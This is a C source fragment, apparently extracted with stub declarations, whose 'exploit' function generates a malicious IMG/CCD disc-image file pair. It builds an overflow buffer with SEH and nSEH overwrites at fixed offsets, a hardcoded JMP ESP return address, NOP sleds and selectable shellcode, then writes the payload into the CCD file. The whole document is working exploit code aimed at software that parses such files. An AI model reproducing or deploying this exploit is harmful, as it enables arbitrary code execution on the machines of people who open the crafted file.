
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {char* shellcode; } ;
typedef int FILE ;


 char* ccd ;
 int exit (int ) ;
 int fclose (int *) ;
 int * fopen (char*,char*) ;
 int free (char*) ;
 int fwrite (char*,int,int,int *) ;
 int gen_random (char*,int) ;
 int getFsize (int *,char*) ;
 char* img ;
 size_t input ;
 int memcpy (char*,char*,int) ;
 int memset (char*,int,int) ;
 char* nseh ;
 char* overflow ;
 int print (char*) ;
 int printf (char*,int) ;
 TYPE_1__* s ;
 int scanf (char*,size_t*) ;
 char* seh ;
 int strlen (char*) ;

void exploit(char* fname,char* gname)
    { int sz1;
          scanf("%d",&input);
           FILE* f=fopen(fname,"wb");
            if(f){
             fwrite(img,sizeof(char),109974,f);
                 sz1=getFsize(f,fname);
                printf("[!]Img file is: %d bytes\n",sz1);
              fclose(f);
              free(img);
             }
             else {print("error writing img file"); exit(0); }
               char jmpesp[]="\xED\x1E\x94\x7C";
              gen_random(overflow,10974);
              memcpy(overflow+5067,seh,4);
              memcpy(overflow+5063,nseh,4);
              memset(overflow+5071,0x90,900);
              memcpy(overflow+5081,s[input].shellcode,strlen(s[input].shellcode));
              memcpy(overflow+843,jmpesp,4);
              memset(overflow+847,0x90,10);
              memcpy(overflow+857,s[input].shellcode,strlen(s[input].shellcode));
              FILE* g=fopen(gname,"wb");
               if(g){
                fwrite(ccd,sizeof(char),strlen(ccd),g);
                fwrite(overflow,sizeof(char),strlen(overflow),g);
                  fclose(g);
                   free(ccd);
                  free(overflow);
                 }
                 else
                 {print("error writing ccd file"); exit(0); }
                    int sz2;
                     sz2=getFsize(g,gname);
                      printf("[!]CCD file is: %d bytes\n",sz2);
                   }
